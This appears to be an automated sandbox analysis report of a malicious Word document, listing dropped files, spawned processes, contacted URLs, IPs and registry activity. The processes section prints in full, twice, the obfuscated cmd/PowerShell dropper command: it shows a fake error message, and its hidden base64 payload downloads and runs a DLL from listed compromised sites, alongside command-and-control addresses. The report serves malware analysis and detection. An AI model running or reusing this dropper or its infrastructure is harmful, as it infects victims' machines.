Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
Arch_2021_717-1562532.doc
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Et odit non optio. Aut
reprehenderit eaque ullam. Labore dignissimos rerum rerum voluptas quod et aut assumenda. Qui sed eos sit suscipit., Author:
Victoria Murillo, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Jan 25 09:28:00
2021, Last Saved Time/Date: Mon Jan 25 09:28:00 2021, Number of Pages: 1, Number of Words: 5622, Number of Characters: 32047,
Security: 8
|
initial sample
|
||
C:\Users\user\Kaktksw\An6othh\N49I.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B6528223-1CF8-4E74-AA78-05F4F57053A0}.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E52EFAE2-E64E-47DE-AFA9-74F75F545893}.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Arch_2021_717-1562532.LNK
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16
2020, mtime=Wed Aug 26 14:08:16 2020, atime=Tue Jan 26 20:32:39 2021, length=175616, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XU9O8G9A8UDMPEGZGHPP.temp
|
data
|
dropped
|
||
C:\Users\user\Desktop\~$ch_2021_717-1562532.doc
|
data
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
|
||
C:\Windows\System32\cmd.exe
|
cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc
UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACgAJwAgAG4AJwArACcAZAA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwBlAG8AJwApACsAKAAnAHAAYQByACcAKwAnAGQAYwAnACkAKwAoACcAcgBhAG4AJwArACcAZQBzACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AJwArACcAegB5AG4AcQAnACkAKwAnAC0AJwArACcAbAAnACsAKAAnAGkAJwArACcAbgB1ACcAKwAnAHgAJwArACcALQB5AGEAYQB5ACcAKQArACcAZgAvACcAKwAoACcAdwAnACsAJwAvACEAbgAnACkAKwAnAHMAIAAnACsAKAAnAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgACcAKQArACcAbgAnACsAJwBkACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AbQBtAHIAaQBuAGMAJwArACcAcwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACsAJwAvAGUAdABlAHIAbgBhAGwALQAnACkAKwAoACcAZAAnACsAJwB1AGUAbAAnACkAKwAoACcAaQAnACsAJwBzAHQALQAnACkAKwAoACcAOQBjAHUAJwArACcAcQB2AC8AagAnACkAKwAoACcAeAAnACsAJwBHAFEAagAvACEAJwArACcAbgAnACkAKwAoACcAcwAnACsAJwAgAHcAJwApACsAKAAnAHUAIABkACcAKwAnAGIAIABuAGQAJwArACcAOgAvACcAKQArACgAJwAvADMAJwArACcAbQB1ACcAKwAnAHMAawAnACkAKwAnAGUAdAAnACsAKAAnAGUAZQByACcAKwAnAHMAZQBuAHQALgBuAGUAJwArACcAdAAvACcAKQArACgAJwB3ACcAKwAnAHAALQBpAG4AJwArACcAYwBsAHUAZABlAHMALwBUAFUAJwArACcAZwBEAC8AIQBuACcAKwAnAHMAIAAnACkAKwAnAHcAdQAnACsAJwAgACcAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AZAAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAcwAnACsAJwBrAGkAbABtAHUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB3ACcAKwAnAHAALQBhACcAKQArACcAZAAnACsAKAAnAG0AaQBuAC8AJwArACcAaAAnACsAJwBRACcAKQArACgAJwBWAGwAQgAnACsAJwA4AGIALwAnACkAKQAuACIAcgBgAGUAUABsAEEAYABjAEUAIgAoACgAKAAnAG4AcwAnACsAJwAgACcAKQArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAnAG4AZAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEsAMQBpAHUAeAB4AHAALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBwAGAAbABpAFQAIgAoACQARAA1ADQAUwAgACsAIAAkAEsAbwAzAGEAYwA2ADMAIAArACAAJABGADAAOABKACkAOwAkAE8AMQA2AFIAPQAoACcAWAA2ACcAKwAnADIAVgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEoAZAA1AHMAXwBoAGYAIABpAG4AIAAkAFQAYQAxAHkAcwBwADQAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAHMAeQBTAFQARQBNAC4ATgBlAFQALgB3AEUAQgBDAEwASQBFAG4AdAApAC4AIgBEAE8AdwBOAGAATABgAG8AQQBgAEQARgBJAGwARQAiACgAJABKAGQANQBzAF8AaABmACwAIAAkAFEAZgB4ADEAMAB4AGEAKQA7ACQATAAyADkARAA9ACgAJwBPADYAJwArACcANABIACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABRAGYAeAAxADAAeABhACkALgAiAEwAYABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAA0ADQANwAxADIAKQAgAHsAJgAoACcAcgB1AG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQAUQBmAHgAMQAwAHgAYQAsACgAJwBBACcAKwAoACcAbgB5AFMAdAAnACsAJwByACcAKQArACgAJwBpACcAKwAnAG4AZwAnACkAKQAuACIAVABvAHMAYABUAFIAaQBgAE4AZwAiACgAKQA7ACQAQgAyADcAQgA9ACgAKAAnAFcANAAnACsAJwAzACcAKQArACcAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFoAOAAxAFYAPQAoACcASQA2ACcAKwAnADIAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIANQA4AEkAPQAoACcATwAzACcAKwAnADUASQAnACkA
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACgAJwAgAG4AJwArACcAZAA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwBlAG8AJwApACsAKAAnAHAAYQByACcAKwAnAGQAYwAnACkAKwAoACcAcgBhAG4AJwArACcAZQBzACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AJwArACcAegB5AG4AcQAnACkAKwAnAC0AJwArACcAbAAnACsAKAAnAGkAJwArACcAbgB1ACcAKwAnAHgAJwArACcALQB5AGEAYQB5ACcAKQArACcAZgAvACcAKwAoACcAdwAnACsAJwAvACEAbgAnACkAKwAnAHMAIAAnACsAKAAnAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgACcAKQArACcAbgAnACsAJwBkACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AbQBtAHIAaQBuAGMAJwArACcAcwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACsAJwAvAGUAdABlAHIAbgBhAGwALQAnACkAKwAoACcAZAAnACsAJwB1AGUAbAAnACkAKwAoACcAaQAnACsAJwBzAHQALQAnACkAKwAoACcAOQBjAHUAJwArACcAcQB2AC8AagAnACkAKwAoACcAeAAnACsAJwBHAFEAagAvACEAJwArACcAbgAnACkAKwAoACcAcwAnACsAJwAgAHcAJwApACsAKAAnAHUAIABkACcAKwAnAGIAIABuAGQAJwArACcAOgAvACcAKQArACgAJwAvADMAJwArACcAbQB1ACcAKwAnAHMAawAnACkAKwAnAGUAdAAnACsAKAAnAGUAZQByACcAKwAnAHMAZQBuAHQALgBuAGUAJwArACcAdAAvACcAKQArACgAJwB3ACcAKwAnAHAALQBpAG4AJwArACcAYwBsAHUAZABlAHMALwBUAFUAJwArACcAZwBEAC8AIQBuACcAKwAnAHMAIAAnACkAKwAnAHcAdQAnACsAJwAgACcAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AZAAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAcwAnACsAJwBrAGkAbABtAHUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB3ACcAKwAnAHAALQBhACcAKQArACcAZAAnACsAKAAnAG0AaQBuAC8AJwArACcAaAAnACsAJwBRACcAKQArACgAJwBWAGwAQgAnACsAJwA4AGIALwAnACkAKQAuACIAcgBgAGUAUABsAEEAYABjAEUAIgAoACgAKAAnAG4AcwAnACsAJwAgACcAKQArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAnAG4AZAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEsAMQBpAHUAeAB4AHAALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBwAGAAbABpAFQAIgAoACQARAA1ADQAUwAgACsAIAAkAEsAbwAzAGEAYwA2ADMAIAArACAAJABGADAAOABKACkAOwAkAE8AMQA2AFIAPQAoACcAWAA2ACcAKwAnADIAVgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEoAZAA1AHMAXwBoAGYAIABpAG4AIAAkAFQAYQAxAHkAcwBwADQAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAHMAeQBTAFQARQBNAC4ATgBlAFQALgB3AEUAQgBDAEwASQBFAG4AdAApAC4AIgBEAE8AdwBOAGAATABgAG8AQQBgAEQARgBJAGwARQAiACgAJABKAGQANQBzAF8AaABmACwAIAAkAFEAZgB4ADEAMAB4AGEAKQA7ACQATAAyADkARAA9ACgAJwBPADYAJwArACcANABIACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABRAGYAeAAxADAAeABhACkALgAiAEwAYABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAA0ADQANwAxADIAKQAgAHsAJgAoACcAcgB1AG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQAUQBmAHgAMQAwAHgAYQAsACgAJwBBACcAKwAoACcAbgB5AFMAdAAnACsAJwByACcAKQArACgAJwBpACcAKwAnAG4AZwAnACkAKQAuACIAVABvAHMAYABUAFIAaQBgAE4AZwAiACgAKQA7ACQAQgAyADcAQgA9ACgAKAAnAFcANAAnACsAJwAzACcAKQArACcAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFoAOAAxAFYAPQAoACcASQA2ACcAKwAnADIAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIANQA4AEkAPQAoACcATwAzACcAKwAnADUASQAnACkA
|
||
C:\Windows\System32\rundll32.exe
|
'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
|
||
C:\Windows\SysWOW64\rundll32.exe
|
'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',HGTGPppTjVNX
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',tPlaqqOeWpG
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',SlGUqAwWB
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',AkVsWQgzjbvUf
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',#1
|
||
C:\Windows\System32\msg.exe
|
msg user /v Word experienced an error trying to open the file.
|
There are 5 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://217.160.169.110:8080/zrm2/7son14/mlqmfbi2uji6/
|
217.160.169.110
|
||
http://3musketeersent.net/wp-includes/TUgD/
|
unknown
|
||
https://skilmu.com/wp-admin/hQVlB8b/
|
unknown
|
||
http://jeevanlic.com/wp-content/r8M/
|
unknown
|
||
http://dashudance.com/thinkphp/dgs7Jm9/
|
unknown
|
||
http://shannared.com
|
unknown
|
||
http://shannared.com/content/lhALeS/
|
192.169.223.13
|
||
http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/
|
unknown
|
||
http://leopardcranes.com/zynq-linux-yaayf/w/
|
unknown
|
||
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
|
unknown
|
||
http://www.windows.com/pctv.
|
unknown
|
||
http://investor.msn.com
|
unknown
|
||
http://www.msnbc.com/news/ticker.txt
|
unknown
|
||
http://www.icra.org/vocabulary/.
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
|
unknown
|
||
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
|
unknown
|
||
http://investor.msn.com/
|
unknown
|
||
http://www.piriform.com/ccleaner
|
unknown
|
||
http://www.%s.comPA
|
unknown
|
||
http://windowsmedia.com/redir/services.asp?WMPFriendly=true
|
unknown
|
||
http://www.hotmail.com/oe
|
unknown
|
There are 11 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
shannared.com
|
192.169.223.13
|
IPs
IP
|
Domain
|
Country
|
Active
|
Malicious
|
|
---|---|---|---|---|---|
217.160.169.110
|
unknown
|
Germany
|
unknown
|
||
51.255.203.164
|
unknown
|
France
|
unknown
|
||
84.232.229.24
|
unknown
|
Romania
|
unknown
|
||
192.169.223.13
|
unknown
|
United States
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
)'8
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
a(8
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
9*8
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
VBAFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ReviewToken
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
EDC4B
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Arial Unicode MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Batang
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@BatangChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DFKai-SB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Dotum
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DotumChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@FangSong
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gulim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GulimChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gungsuh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GungsuhChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@KaiTi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Malgun Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft JhengHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft YaHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Mincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS PGothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS PMincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS UI Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@NSimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimSun-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Agency FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aharoni
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Algerian
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Andalus
